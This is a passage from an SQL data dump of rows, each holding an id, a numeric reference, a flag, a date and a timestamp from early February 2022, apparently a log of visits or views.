01:54:33'),(43982,1614,1,'2022-02-02','2022-02-02 03:46:40'),(43983,2309,1,'2022-02-02','2022-02-02 04:01:37'),(43984,2248,1,'2022-02-02','2022-02-02 04:16:42'),(43985,2309,1,'2022-02-02','2022-02-02 04:32:52'),(43986,3691,1,'2022-02-02','2022-02-02 04:46:41'),(43987,108,1,'2022-02-02','2022-02-02 04:50:57'),(43988,1588,1,'2022-02-02','2022-02-02 05:01:45'),(43989,1596,1,'2022-02-02','2022-02-02 05:09:46'),(43990,80,1,'2022-02-02','2022-02-02 05:19:52'),(43991,108,1,'2022-02-02','2022-02-02 05:21:26'),(43992,1592,1,'2022-02-02','2022-02-02 05:34:32'),(43993,3257,1,'2022-02-02','2022-02-02 05:44:33'),(43994,1870,1,'2022-02-02','2022-02-02 06:13:25'),(43995,3030,1,'2022-02-02','2022-02-02 06:14:32'),(43996,1544,1,'2022-02-02','2022-02-02 06:21:03'),(43997,1604,1,'2022-02-02','2022-02-02 06:24:31'),(43998,1598,1,'2022-02-02','2022-02-02 06:34:33'),(43999,1586,1,'2022-02-02','2022-02-02 07:05:06'),(44000,68,1,'2022-02-02','2022-02-02 07:21:46'),(44001,3691,1,'2022-02-02','2022-02-02 08:06:36'),(44002,1602,1,'2022-02-02','2022-02-02 09:26:39'),(44003,68,1,'2022-02-02','2022-02-02 09:32:58'),(44004,72,1,'2022-02-02','2022-02-02 09:39:10'),(44005,2503,1,'2022-02-02','2022-02-02 09:39:47'),(44006,72,1,'2022-02-02','2022-02-02 09:41:25'),(44007,91,1,'2022-02-02','2022-02-02 09:48:08'),(44008,68,1,'2022-02-02','2022-02-02 11:38:23'),(44009,68,1,'2022-02-02','2022-02-02 11:38:57'),(44010,80,1,'2022-02-02','2022-02-02 11:39:24'),(44011,1602,1,'2022-02-02','2022-02-02 11:51:12'),(44012,4400,1,'2022-02-02','2022-02-02 11:54:30'),(44013,1600,1,'2022-02-02','2022-02-02 12:13:59'),(44014,1586,1,'2022-02-02','2022-02-02 12:28:01'),(44015,1608,1,'2022-02-02','2022-02-02 14:35:23'),(44016,1600,1,'2022-02-02','2022-02-02 14:36:14'),(44017,1600,1,'2022-02-02','2022-02-02 14:36:41'),(44018,1602,1,'2022-02-02','2022-02-02 14:39:44'),(44019,472,1,'2022-02-02','2022-02-02 14:52:33'),(44020,1600,1,'2022-02-02','2022-02-02 14:56:34'),(44021,3764,1,'2022-02-02','2022-02-02 14:56:50'),(44022,1600,1,'2022-02-02','2022-02-02 14:59:06'),(44023,3781,1,'2022-02-02','2022-02-02 15:09:39'),(44024,4542,1,'2022-02-02','2022-02-02 15:32:24'),(44025,1586,1,'2022-02-02','2022-02-02 15:45:27'),(44026,1602,1,'2022-02-02','2022-02-02 15:51:07'),(44027,2410,1,'2022-02-02','2022-02-02 15:52:29'),(44028,467,1,'2022-02-02','2022-02-02 15:55:35'),(44029,2804,1,'2022-02-02','2022-02-02 16:01:08'),(44030,1600,1,'2022-02-02','2022-02-02 16:03:52'),(44031,3282,1,'2022-02-02','2022-02-02 16:05:22'),(44032,1600,1,'2022-02-02','2022-02-02 16:06:52'),(44033,570,1,'2022-02-02','2022-02-02 16:08:34'),(44034,1586,1,'2022-02-02','2022-02-02 16:09:48'),(44035,2609,1,'2022-02-02','2022-02-02 16:16:08'),(44036,2617,1,'2022-02-02','2022-02-02 16:23:34'),(44037,1718,1,'2022-02-02','2022-02-02 16:31:05'),(44038,4323,1,'2022-02-02','2022-02-02 16:38:36'),(44039,1612,1,'2022-02-02','2022-02-02 16:43:03'),(44040,2904,1,'2022-02-02','2022-02-02 16:43:34'),(44041,2904,1,'2022-02-02','2022-02-02 16:43:36'),(44042,3479,1,'2022-02-02','2022-02-02 16:59:28'),(44043,1872,1,'2022-02-02','2022-02-02 17:03:06'),(44044,1877,1,'2022-02-02','2022-02-02 17:03:09'),(44045,1695,1,'2022-02-02','2022-02-02 17:05:29'),(44046,1877,1,'2022-02-02','2022-02-02 17:05:30'),(44047,72,1,'2022-02-02','2022-02-02 17:10:43'),(44048,1600,1,'2022-02-02','2022-02-02 17:34:46'),(44049,2993,1,'2022-02-02','2022-02-02 17:46:06'),(44050,1586,1,'2022-02-02','2022-02-02 17:53:36'),(44051,80,1,'2022-02-02','2022-02-02 17:55:32'),(44052,469,1,'2022-02-02','2022-02-02 18:16:36'),(44053,3226,1,'2022-02-02','2022-02-02 18:25:16'),(44054,3243,1,'2022-02-02','2022-02-02 18:31:08'),(44055,3278,1,'2022-02-02','2022-02-02 18:32:56'),(44056,3278,1,'2022-02-02','2022-02-02 18:36:30'),(44057,4436,1,'2022-02-02','2022-02-02 18:46:04'),(44058,1588,1,'2022-02-02','2022-02-02 18:56:25'),(44059,477,1,'2022-02-02','2022-02-02 19:01:58'),(44060,1588,1,'2022-02-02','2022-02-02 19:08:33'),(44061,1594,1,'2022-02-02','2022-02-02 19:08:36'),(44062,3030,1,'2022-02-02','2022-02-02 19:31:06'),(44063,4514,1,'2022-02-02','2022-02-02 19:38:36'),(44064,1604,1,'2022-02-02','2022-02-02 19:46:13'),(44065,1598,1,'2022-02-02','2022-02-02 19:53:35'),(44066,1602,1,'2022-02-02','2022-02-02 19:58:15'),(44067,2609,1,'2022-02-02','2022-02-02 20:07:53'),(44068,1774,1,'2022-02-02','2022-02-02 20:08:34'),(44069,1582,1,'2022-02-02','2022-02-02 20:16:08'),(44070,1614,1,'2022-02-02','2022-02-02 20:23:35'),(44071,1612,1,'2022-02-02','2022-02-02 20:31:06'),(44072,1718,1,'2022-02-02','2022-02-02 20:53:34'),(44073,3107,1,'2022-02-02','2022-02-02 21:23:35'),(44074,68,1,'2022-02-02','2022-02-02 21:31:37'),(44075,3030,1,'2022-02-02','2022-02-02 21:53:35'),(44076,80,1,'2022-02-02','2022-02-02 22:11:43'),(44077,1614,1,'2022-02-02','2022-02-02 23:57:29'),(44078,76,1,'2022-02-03','2022-02-03 01:16:32'),(44079,2309,1,'2022-02-03','2022-02-03 02:13:01'),(44080,1724,1,'2022-02-03','2022-02-03 02:18:26'),(44081,3746,1,'2022-02-03','2022-02-03 02:28:04'),(44082,1594,1,'2022-02-03','2022-02-03 02:30:35'),(44083,1594,1,'2022-02-03','2022-02-03 02:30:49'),(44084,2769,1,'2022-02-03','2022-02-03 03:10:38'),(44085,1596,1,'2022-02-03','2022-02-03 03:19:15'),(44086,1594,1,'2022-02-03','2022-02-03 03:27:50'),(44087,1598,1,'2022-02-03','2022-02-03 03:35:32'),(44088,2248,1,'2022-02-03','2022-02-03 03:37:02'),(44089,3781,1,'2022-02-03','2022-02-03 03:42:53'),(44090,2989,1,'2022-02-03','2022-02-03 03:44:56'),(44091,1600,1,'2022-02-03','2022-02-03 03:53:48'),(44092,3313,1,'2022-02-03','2022-02-03 04:23:41'),(44093,1600,1,'2022-02-03','2022-02-03 06:20:25'),(44094,1604,1,'2022-02-03','2022-02-03 06:23:34'),(44095,4524,1,'2022-02-03','2022-02-03 06:35:28'),(44096,1877,1,'2022-02-03','2022-02-03 06:38:31'),(44097,68,1,'2022-02-03','2022-02-03 06:44:24'),(44098,4520,1,'2022-02-03','2022-02-03 06:50:25'),(44099,3245,1,'2022-02-03','2022-02-03 06:56:29'),(44100,3090,1,'2022-02-03','2022-02-03 07:08:24'),(44101,3092,1,'2022-02-03','2022-02-03 07:20:24'),(44102,3058,1,'2022-02-03','2022-02-03 07:50:30'),(44103,2161,1,'2022-02-03','2022-02-03 07:50:49'),(44104,3707,1,'2022-02-03','2022-02-03 07:56:25'),(44105,3034,1,'2022-02-03','2022-02-03 08:08:24'),(44106,2296,1,'2022-02-03','2022-02-03 08:14:25'),(44107,3102,1,'2022-02-03','2022-02-03 08:20:37'),(44108,3175,1,'2022-02-03','2022-02-03 08:32:28'),(44109,1594,1,'2022-02-03','2022-02-03 08:33:01'),(44110,1743,1,'2022-02-03','2022-02-03 08:44:30'),(44111,3271,1,'2022-02-03','2022-02-03 08:58:20'),(44112,3271,1,'2022-02-03','2022-02-03 08:58:21'),(44113,3271,1,'2022-02-03','2022-02-03 08:59:49'),(44114,479,1,'2022-02-03','2022-02-03 09:02:39'),(44115,3127,1,'2022-02-03','2022-02-03 09:14:29'),(44116,3781,1,'2022-02-03','2022-02-03 09:24:11'),(44117,72,1,'2022-02-03','2022-02-03 10:03:44'),(44118,1544,1,'2022-02-03','2022-02-03 10:07:05'),(44119,1612,1,'2022-02-03','2022-02-03 10:49:43'),(44120,472,1,'2022-02-03','2022-02-03 11:05:25'),(44121,4457,1,'2022-02-03','2022-02-03 11:19:15'),(44122,3041,1,'2022-02-03','2022-02-03 11:20:26'),(44123,1604,1,'2022-02-03','2022-02-03 11:29:32'),(44124,91,1,'2022-02-03','2022-02-03 11:33:27'),(44125,4404,1,'2022-02-03','2022-02-03 11:37:08'),(44126,4404,1,'2022-02-03','2022-02-03 11:37:10'),(44127,91,1,'2022-02-03','2022-02-03 11:43:34'),(44128,1604,1,'2022-02-03','2022-02-03 11:49:12'),(44129,80,1,'2022-02-03','2022-02-03 12:42:03'),(44130,1582,1,'2022-02-03','2022-02-03 13:02:02'),(44131,91,1,'2022-02-03','2022-02-03 13:02:31'),(44132,4556,1,'2022-02-03','2022-02-03 13:02:45'),(44133,4556,1,'2022-02-03','2022-02-03 13:02:46'),(44134,4542,1,'2022-02-03','2022-02-03 13:11:02'),(44135,470,1,'2022-02-03','2022-02-03 13:12:09'),(44136,1602,1,'2022-02-03','2022-02-03 13:16:28'),(44137,91,1,'2022-02-03','2022-02-03 13:28:12'),(44138,4448,1,'2022-02-03','2022-02-03 13:28:56'),(44139,4448,1,'2022-02-03','2022-02-03 13:28:57'),(44140,3691,1,'2022-02-03','2022-02-03 13:43:28'),(44141,1544,1,'2022-02-03','2022-02-03 13:54:06'),(44142,2813,1,'2022-02-03','2022-02-03 13:57:07'),(44143,1598,1,'2022-02-03','2022-02-03 14:18:19'),(44144,1598,1,'2022-02-03','2022-02-03 14:18:38'),(44145,68,1,'2022-02-03','2022-02-03 14:19:00'),(44146,1598,1,'2022-02-03','2022-02-03 14:19:16'),(44147,1600,1,'2022-02-03','2022-02-03 14:25:40'),(44148,68,1,'2022-02-03','2022-02-03 14:26:01'),(44149,2993,1,'2022-02-03','2022-02-03 14:27:06'),(44150,4457,1,'2022-02-03','2022-02-03 14:27:34'),(44151,68,1,'2022-02-03','2022-02-03 14:27:49'),(44152,4457,1,'2022-02-03','2022-02-03 14:27:57'),(44153,4377,1,'2022-02-03','2022-02-03 14:32:56'),(44154,1614,1,'2022-02-03','2022-02-03 15:12:03'),(44155,2309,1,'2022-02-03','2022-02-03 15:27:04'),(44156,1592,1,'2022-02-03','2022-02-03 15:42:04'),(44157,108,1,'2022-02-03','2022-02-03 15:45:32'),(44158,1608,1,'2022-02-03','2022-02-03 15:45:45'),(44159,4457,1,'2022-02-03','2022-02-03 15:48:08'),(44160,1598,1,'2022-02-03','2022-02-03 16:01:48'),(44161,1600,1,'2022-02-03','2022-02-03 16:01:59'),(44162,2769,1,'2022-02-03','2022-02-03 16:11:27'),(44163,1594,1,'2022-02-03','2022-02-03 16:14:27'),(44164,1606,1,'2022-02-03','2022-02-03 16:15:28'),(44165,570,1,'2022-02-03','2022-02-03 16:23:27'),(44166,4420,1,'2022-02-03','2022-02-03 16:37:46'),(44167,2769,1,'2022-02-03','2022-02-03 16:39:36'),(44168,2609,1,'2022-02-03','2022-02-03 16:42:05'),(44169,2769,1,'2022-02-03','2022-02-03 16:43:25'),(44170,1608,1,'2022-02-03','2022-02-03 16:45:46'),(44171,4404,1,'2022-02-03','2022-02-03 16:45:58'),(44172,1602,1,'2022-02-03','2022-02-03 17:22:09'),(44173,3764,1,'2022-02-03','2022-02-03 17:32:04'),(44174,469,1,'2022-02-03','2022-02-03 17:42:19'),(44175,108,1,'2022-02-03','2022-02-03 17:48:43'),(44176,4457,1,'2022-02-03','2022-02-03 18:01:25'),(44177,2813,1,'2022-02-03','2022-02-03 18:05:26'),(44178,1718,1,'2022-02-03','2022-02-03 18:12:07'),(44179,1602,1,'2022-02-03','2022-02-03 18:19:57'),(44180,468,1,'2022-02-03','2022-02-03 18:32:03'),(44181,2965,1,'2022-02-03','2022-02-03 18:45:13'),(44182,1732,1,'2022-02-03','2022-02-03 18:45:25'),(44183,4428,1,'2022-02-03','2022-02-03 18:46:06'),(44184,1872,1,'2022-02-03','2022-02-03 18:47:09'),(44185,4529,1,'2022-02-03','2022-02-03 18:58:21'),(44186,3313,1,'2022-02-03','2022-02-03 19:04:50'),(44187,2420,1,'2022-02-03','2022-02-03 19:13:07'),(44188,2617,1,'2022-02-03','2022-02-03 19:14:15'),(44189,3691,1,'2022-02-03','2022-02-03 19:29:51'),(44190,1612,1,'2022-02-03','2022-02-03 19:37:04'),(44191,2410,1,'2022-02-03','2022-02-03 19:48:08'),(44192,1877,1,'2022-02-03','2022-02-03 19:53:47'),(44193,89,1,'2022-02-03','2022-02-03 19:59:36'),(44194,472,1,'2022-02-03','2022-02-03 20:11:22'),(44195,1602,1,'2022-02-03','2022-02-03 20:17:11'),(44196,1594,1,'2022-02-03','2022-02-03 20:23:01'),(44197,3710,1,'2022-02-03','2022-02-03 20:28:55'),(44198,1596,1,'2022-02-03','2022-02-03 20:34:44'),(44199,1582,1,'2022-02-03','2022-02-03 20:41:10'),(44200,80,1,'2022-02-03','2022-02-03 20:52:18'),(44201,4514,1,'2022-02-03','2022-02-03 21:04:00'),(44202,2993,1,'2022-02-03','2022-02-03 21:10:15'),(44203,3764,1,'2022-02-03','2022-02-03 21:15:46'),(44204,4238,1,'2022-02-03','2022-02-03 21:20:49'),(44205,2965,1,'2022-02-03','2022-02-03 21:57:51'),(44206,3781,1,'2022-02-03','2022-02-03 22:11:53'),(44207,1608,1,'2022-02-03','2022-02-03 22:12:49'),(44208,2558,1,'2022-02-03','2022-02-03 22:13:54'),(44209,1608,1,'2022-02-03','2022-02-03 22:16:06'),(44210,2558,1,'2022-02-03','2022-02-03 22:17:31'),(44211,3764,1,'2022-02-03','2022-02-03 22:20:37'),(44212,4448,1,'2022-02-03','2022-02-03 22:20:49'),(44213,3124,1,'2022-02-03','2022-02-03 23:08:08'),(44214,4391,1,'2022-02-03','2022-02-03 23:20:48'),(44215,3707,1,'2022-02-03','2022-02-03 23:36:15'),(44216,2804,1,'2022-02-03','2022-02-03 23:50:17'),(44217,1598,1,'2022-02-04','2022-02-04 00:19:13'),(44218,3175,1,'2022-02-04','2022-02-04 00:34:47'),(44219,1606,1,'2022-02-04','2022-02-04 00:34:48'),(44220,3674,1,'2022-02-04','2022-02-04 01:23:47'),(44221,1544,1,'2022-02-04','2022-02-04 01:26:40'),(44222,1544,1,'2022-02-04','2022-02-04 01:29:28'),(44223,487,1,'2022-02-04','2022-02-04 01:34:45'),(44224,1699,1,'2022-02-04','2022-02-04 01:34:47'),(44225,4326,1,'2022-02-04','2022-02-04 01:43:01'),(44226,1602,1,'2022-02-04','2022-02-04 02:11:10'),(44227,1600,1,'2022-02-04','2022-02-04 02:15:05'),(44228,68,1,'2022-02-04','2022-02-04 02:26:55'),(44229,3261,1,'2022-02-04','2022-02-04 03:50:08'),(44230,2297,1,'2022-02-04','2022-02-04 04:20:30'),(44231,2813,1,'2022-02-04','2022-02-04 05:34:12'),(44232,1592,1,'2022-02-04','2022-02-04 05:42:46'),(44233,2309,1,'2022-02-04','2022-02-04 06:07:08'),(44234,1610,1,'2022-02-04','2022-02-04 06:07:55'),(44235,2309,1,'2022-02-04','2022-02-04 06:08:41'),(44236,1610,1,'2022-02-04','2022-02-04 06:11:02'),(44237,1596,1,'2022-02-04','2022-02-04 06:17:33'),(44238,1596,1,'2022-02-04','2022-02-04 06:32:02'),(44239,3124,1,'2022-02-04','2022-02-04 06:36:07'),(44240,2617,1,'2022-02-04','2022-02-04 06:43:34'),(44241,4520,1,'2022-02-04','2022-02-04 06:44:53'),(44242,470,1,'2022-02-04','2022-02-04 07:22:46'),(44243,1598,1,'2022-02-04','2022-02-04 07:34:51'),(44244,1588,1,'2022-02-04','2022-02-04 07:38:03'),(44245,4542,1,'2022-02-04','2022-02-04 07:45:54'),(44246,4457,1,'2022-02-04','2022-02-04 08:07:21'),(44247,570,1,'2022-02-04','2022-02-04 08:12:23'),(44248,80,1,'2022-02-04','2022-02-04 08:12:34'),(44249,1600,1,'2022-02-04','2022-02-04 08:21:06'),(44250,80,1,'2022-02-04','2022-02-04 08:26:28'),(44251,3789,1,'2022-02-04','2022-02-04 08:30:30'),(44252,1870,1,'2022-02-04','2022-02-04 08:37:38'),(44253,2154,1,'2022-02-04','2022-02-04 08:44:38'),(44254,1602,1,'2022-02-04','2022-02-04 08:46:57'),(44255,1600,1,'2022-02-04','2022-02-04 08:48:55'),(44256,335,1,'2022-02-04','2022-02-04 08:50:51'),(44257,76,1,'2022-02-04','2022-02-04 08:51:40'),(44258,80,1,'2022-02-04','2022-02-04 08:52:09'),(44259,3674,1,'2022-02-04','2022-02-04 08:53:26'),(44260,1728,1,'2022-02-04','2022-02-04 08:56:16'),(44261,1604,1,'2022-02-04','2022-02-04 09:05:22'),(44262,1730,1,'2022-02-04','2022-02-04 09:07:55'),(44263,2309,1,'2022-02-04','2022-02-04 09:08:11'),(44264,3691,1,'2022-02-04','2022-02-04 09:12:06'),(44265,3243,1,'2022-02-04','2022-02-04 09:12:09'),(44266,1582,1,'2022-02-04','2022-02-04 09:26:47'),(44267,1612,1,'2022-02-04','2022-02-04 09:42:47'),(44268,1614,1,'2022-02-04','2022-02-04 09:51:21'),(44269,1608,1,'2022-02-04','2022-02-04 10:02:21'),(44270,4238,1,'2022-02-04','2022-02-04 10:03:39'),(44271,1604,1,'2022-02-04','2022-02-04 10:16:54'),(44272,72,1,'2022-02-04','2022-02-04 10:17:20'),(44273,4377,1,'2022-02-04','2022-02-04 10:41:19'),(44274,1610,1,'2022-02-04','2022-02-04 11:39:46'),(44275,1594,1,'2022-02-04','2022-02-04 12:17:28'),(44276,1604,1,'2022-02-04','2022-02-04 12:29:10'),(44277,4457,1,'2022-02-04','2022-02-04 13:24:32'),(44278,3781,1,'2022-02-04','2022-02-04 13:29:10'),(44279,1606,1,'2022-02-04','2022-02-04 13:29:33'),(44280,2989,1,'2022-02-04','2022-02-04 13:31:29'),(44281,108,1,'2022-02-04','2022-02-04 14:03:33'),(44282,3072,1,'2022-02-04','2022-02-04 14:27:01'),(44283,3102,1,'2022-02-04','2022-02-04 14:55:43'),(44284,469,1,'2022-02-04','2022-02-04 15:06:31'),(44285,1732,1,'2022-02-04','2022-02-04 15:13:38'),(44286,1588,1,'2022-02-04','2022-02-04 16:06:25'),(44287,1606,1,'2022-02-04','2022-02-04 16:17:59'),(44288,2989,1,'2022-02-04','2022-02-04 16:20:35'),(44289,2989,1,'2022-02-04','2022-02-04 16:26:11'),(44290,1606,1,'2022-02-04','2022-02-04 16:26:59'),(44291,1606,1,'2022-02-04','2022-02-04 16:32:06'),(44292,108,1,'2022-02-04','2022-02-04 16:47:09'),(44293,1544,1,'2022-02-04','2022-02-04 17:10:27'),(44294,472,1,'2022-02-04','2022-02-04 17:26:37'),(44295,1720,1,'2022-02-04','2022-02-04 17:26:40'),(44296,1608,1,'2022-02-04','2022-02-04 17:26:42'),(44297,2457,1,'2022-02-04','2022-02-04 17:29:36'),(44298,1596,1,'2022-02-04','2022-02-04 17:35:35'),(44299,80,1,'2022-02-04','2022-02-04 17:38:37'),(44300,1877,1,'2022-02-04','2022-02-04 17:42:25'),(44301,2248,1,'2022-02-04','2022-02-04 17:48:25'),(44302,4524,1,'2022-02-04','2022-02-04 18:12:25'),(44303,72,1,'2022-02-04','2022-02-04 18:14:35'),(44304,1544,1,'2022-02-04','2022-02-04 18:20:55'),(44305,2309,1,'2022-02-04','2022-02-04 18:24:25'),(44306,1695,1,'2022-02-04','2022-02-04 18:26:37'),(44307,2410,1,'2022-02-04','2022-02-04 18:42:24'),(44308,1602,1,'2022-02-04','2022-02-04 18:48:24'),(44309,486,1,'2022-02-04','2022-02-04 18:54:52'),(44310,1594,1,'2022-02-04','2022-02-04 19:01:39'),(44311,3285,1,'2022-02-04','2022-02-04 19:08:28'),(44312,87,1,'2022-02-04','2022-02-04 19:26:35'),(44313,3066,1,'2022-02-04','2022-02-04 19:30:25'),(44314,2159,1,'2022-02-04','2022-02-04 19:35:26'),(44315,3245,1,'2022-02-04','2022-02-04 19:36:34'),(44316,1594,1,'2022-02-04','2022-02-04 19:42:44'),(44317,1598,1,'2022-02-04','2022-02-04 19:48:25'),(44318,3664,1,'2022-02-04','2022-02-04 20:01:10'),(44319,2989,1,'2022-02-04','2022-02-04 20:06:25'),(44320,470,1,'2022-02-04','2022-02-04 20:12:25'),(44321,3710,1,'2022-02-04','2022-02-04 20:36:25'),(44322,570,1,'2022-02-04','2022-02-04 20:39:29'),(44323,570,1,'2022-02-04','2022-02-04 20:40:17'),(44324,1730,1,'2022-02-04','2022-02-04 20:42:24'),(44325,570,1,'2022-02-04','2022-02-04 20:51:20'),(44326,570,1,'2022-02-04','2022-02-04 20:55:38'),(44327,3053,1,'2022-02-04','2022-02-04 21:04:26'),(44328,3175,1,'2022-02-04','2022-02-04 21:18:26'),(44329,1544,1,'2022-02-04','2022-02-04 21:44:27'),(44330,2989,1,'2022-02-04','2022-02-04 22:00:25'),(44331,2410,1,'2022-02-04','2022-02-04 22:06:26'),(44332,3127,1,'2022-02-04','2022-02-04 22:12:25'),(44333,3261,1,'2022-02-04','2022-02-04 22:18:29'),(44334,2804,1,'2022-02-04','2022-02-04 22:24:26'),(44335,3664,1,'2022-02-04','2022-02-04 22:30:24'),(44336,3285,1,'2022-02-04','2022-02-04 22:36:25'),(44337,1594,1,'2022-02-04','2022-02-04 22:41:22'),(44338,1872,1,'2022-02-04','2022-02-04 22:48:25'),(44339,76,1,'2022-02-04','2022-02-04 23:00:28'),(44340,1602,1,'2022-02-04','2022-02-04 23:05:26'),(44341,2296,1,'2022-02-04','2022-02-04 23:12:41'),(44342,1598,1,'2022-02-04','2022-02-04 23:18:25'),(44343,1582,1,'2022-02-04','2022-02-04 23:21:03'),(44344,1604,1,'2022-02-04','2022-02-04 23:24:24'),(44345,1582,1,'2022-02-04','2022-02-04 23:30:24'),(44346,3707,1,'2022-02-04','2022-02-04 23:36:24'),(44347,2813,1,'2022-02-04','2022-02-04 23:42:24'),(44348,1586,1,'2022-02-04','2022-02-04 23:48:24'),(44349,76,1,'2022-02-04','2022-02-04 23:54:24'),(44350,3090,1,'2022-02-05','2022-02-05 00:00:25'),(44351,2296,1,'2022-02-05','2022-02-05 00:06:24'),(44352,1602,1,'2022-02-05','2022-02-05 00:18:25'),(44353,1602,1,'2022-02-05','2022-02-05 00:25:34'),(44354,3746,1,'2022-02-05','2022-02-05 00:30:24'),(44355,68,1,'2022-02-05','2022-02-05 00:36:27'),(44356,3746,1,'2022-02-05','2022-02-05 00:42:24'),(44357,1870,1,'2022-02-05','2022-02-05 01:03:27'),(44358,2159,1,'2022-02-05','2022-02-05 01:15:23'),(44359,2159,1,'2022-02-05','2022-02-05 01:30:25'),(44360,1592,1,'2022-02-05','2022-02-05 01:46:05'),(44361,4448,1,'2022-02-05','2022-02-05 02:03:41'),(44362,72,1,'2022-02-05','2022-02-05 02:20:17'),(44363,1612,1,'2022-02-05','2022-02-05 02:45:25'),(44364,2420,1,'2022-02-05','2022-02-05 03:00:24'),(44365,4391,1,'2022-02-05','2022-02-05 03:03:28'),(44366,3781,1,'2022-02-05','2022-02-05 03:15:28'),(44367,2769,1,'2022-02-05','2022-02-05 03:30:28'),(44368,1586,1,'2022-02-05','2022-02-05 05:30:39'),(44369,2609,1,'2022-02-05','2022-02-05 05:55:26'),(44370,2609,1,'2022-02-05','2022-02-05 06:18:28'),(44371,1606,1,'2022-02-05','2022-02-05 06:21:53'),(44372,3102,1,'2022-02-05','2022-02-05 06:23:38'),(44373,4514,1,'2022-02-05','2022-02-05 06:30:33'),(44374,4517,1,'2022-02-05','2022-02-05 06:37:26'),(44375,3764,1,'2022-02-05','2022-02-05 06:42:50'),(44376,1588,1,'2022-02-05','2022-02-05 06:48:28'),(44377,3269,1,'2022-02-05','2022-02-05 06:58:11'),(44378,1739,1,'2022-02-05','2022-02-05 07:06:36'),(44379,3691,1,'2022-02-05','2022-02-05 07:21:22'),(44380,1709,1,'2022-02-05','2022-02-05 07:22:58'),(44381,4529,1,'2022-02-05','2022-02-05 07:36:25'),(44382,3030,1,'2022-02-05','2022-02-05 07:42:48'),(44383,1774,1,'2022-02-05','2022-02-05 08:06:37'),(44384,4517,1,'2022-02-05','2022-02-05 08:15:05'),(44385,1732,1,'2022-02-05','2022-02-05 08:21:54'),(44386,3178,1,'2022-02-05','2022-02-05 08:32:22'),(44387,3072,1,'2022-02-05','2022-02-05 08:51:54'),(44388,468,1,'2022-02-05','2022-02-05 09:49:15'),(44389,4326,1,'2022-02-05','2022-02-05 09:51:54'),(44390,1600,1,'2022-02-05','2022-02-05 09:52:48'),(44391,4520,1,'2022-02-05','2022-02-05 10:23:33'),(44392,1608,1,'2022-02-05','2022-02-05 10:30:57'),(44393,2309,1,'2022-02-05','2022-02-05 10:49:14'),(44394,3030,1,'2022-02-05','2022-02-05 10:57:53'),(44395,4498,1,'2022-02-05','2022-02-05 11:15:00'),(44396,72,1,'2022-02-05','2022-02-05 11:16:55'),(44397,4529,1,'2022-02-05','2022-02-05 11:23:33'),(44398,2813,1,'2022-02-05','2022-02-05 11:30:55'),(44399,472,1,'2022-02-05','2022-02-05 11:40:53'),(44400,469,1,'2022-02-05','2022-02-05 11:49:14'),(44401,4524,1,'2022-02-05','2022-02-05 12:06:24'),(44402,1602,1,'2022-02-05','2022-02-05 12:14:58'),(44403,1877,1,'2022-02-05','2022-02-05 12:23:32'),(44404,2617,1,'2022-02-05','2022-02-05 12:27:55'),(44405,3282,1,'2022-02-05','2022-02-05 12:31:00'),(44406,1695,1,'2022-02-05','2022-02-05 13:00:56'),(44407,468,1,'2022-02-05','2022-02-05 13:12:13'),(44408,1600,1,'2022-02-05','2022-02-05 13:16:33'),(44409,3102,1,'2022-02-05','2022-02-05 13:50:26'),(44410,2457,1,'2022-02-05','2022-02-05 13:51:35'),(44411,2457,1,'2022-02-05','2022-02-05 13:52:46'),(44412,1544,1,'2022-02-05','2022-02-05 13:55:25'),(44413,1600,1,'2022-02-05','2022-02-05 13:58:13'),(44414,1600,1,'2022-02-05','2022-02-05 13:58:15'),(44415,3781,1,'2022-02-05','2022-02-05 14:00:01'),(44416,1602,1,'2022-02-05','2022-02-05 14:02:37'),(44417,1608,1,'2022-02-05','2022-02-05 14:08:30'),(44418,1600,1,'2022-02-05','2022-02-05 14:11:16'),(44419,1600,1,'2022-02-05','2022-02-05 14:12:14'),(44420,2769,1,'2022-02-05','2022-02-05 14:16:31'),(44421,3030,1,'2022-02-05','2022-02-05 14:17:15'),(44422,1582,1,'2022-02-05','2022-02-05 14:20:53'),(44423,3781,1,'2022-02-05','2022-02-05 14:35:09'),(44424,80,1,'2022-02-05','2022-02-05 14:50:48'),(44425,1720,1,'2022-02-05','2022-02-05 15:03:27'),(44426,1592,1,'2022-02-05','2022-02-05 15:05:48'),(44427,2617,1,'2022-02-05','2022-02-05 15:20:50'),(44428,1614,1,'2022-02-05','2022-02-05 15:36:06'),(44429,2503,1,'2022-02-05','2022-02-05 16:03:26'),(44430,3764,1,'2022-02-05','2022-02-05 16:20:48'),(44431,3038,1,'2022-02-05','2022-02-05 16:35:25'),(44432,3781,1,'2022-02-05','2022-02-05 16:50:52'),(44433,2769,1,'2022-02-05','2022-02-05 17:00:58'),(44434,3787,1,'2022-02-05','2022-02-05 17:03:23'),(44435,4520,1,'2022-02-05','2022-02-05 17:20:49'),(44436,3243,1,'2022-02-05','2022-02-05 17:40:49'),(44437,3791,1,'2022-02-05','2022-02-05 17:50:56'),(44438,2410,1,'2022-02-05','2022-02-05 18:10:51'),(44439,1606,1,'2022-02-05','2022-02-05 18:29:51'),(44440,2297,1,'2022-02-05','2022-02-05 18:29:52'),(44441,108,1,'2022-02-05','2022-02-05 18:44:51'),(44442,72,1,'2022-02-05','2022-02-05 18:46:37'),(44443,2297,1,'2022-02-05','2022-02-05 18:59:51'),(44444,108,1,'2022-02-05','2022-02-05 18:59:55'),(44445,3178,1,'2022-02-05','2022-02-05 19:00:51'),(44446,1544,1,'2022-02-05','2022-02-05 19:14:52'),(44447,1732,1,'2022-02-05','2022-02-05 19:30:01'),(44448,3072,1,'2022-02-05','2022-02-05 19:44:51'),(44449,2154,1,'2022-02-05','2022-02-05 19:59:51'),(44450,1699,1,'2022-02-05','2022-02-05 19:59:55'),(44451,1739,1,'2022-02-05','2022-02-05 20:20:48'),(44452,477,1,'2022-02-05','2022-02-05 20:41:15'),(44453,1582,1,'2022-02-05','2022-02-05 21:01:45'),(44454,3083,1,'2022-02-05','2022-02-05 21:20:50'),(44455,1739,1,'2022-02-05','2022-02-05 22:00:49'),(44456,3710,1,'2022-02-05','2022-02-05 22:40:52'),(44457,80,1,'2022-02-06','2022-02-06 00:21:33'),(44458,3691,1,'2022-02-06','2022-02-06 00:31:34'),(44459,3127,1,'2022-02-06','2022-02-06 00:43:39'),(44460,3083,1,'2022-02-06','2022-02-06 00:43:59'),(44461,2309,1,'2022-02-06','2022-02-06 01:37:28'),(44462,2309,1,'2022-02-06','2022-02-06 01:37:43'),(44463,2309,1,'2022-02-06','2022-02-06 01:38:22'),(44464,2309,1,'2022-02-06','2022-02-06 01:39:57'),(44465,2309,1,'2022-02-06','2022-02-06 01:40:21'),(44466,4517,1,'2022-02-06','2022-02-06 01:49:15'),(44467,3245,1,'2022-02-06','2022-02-06 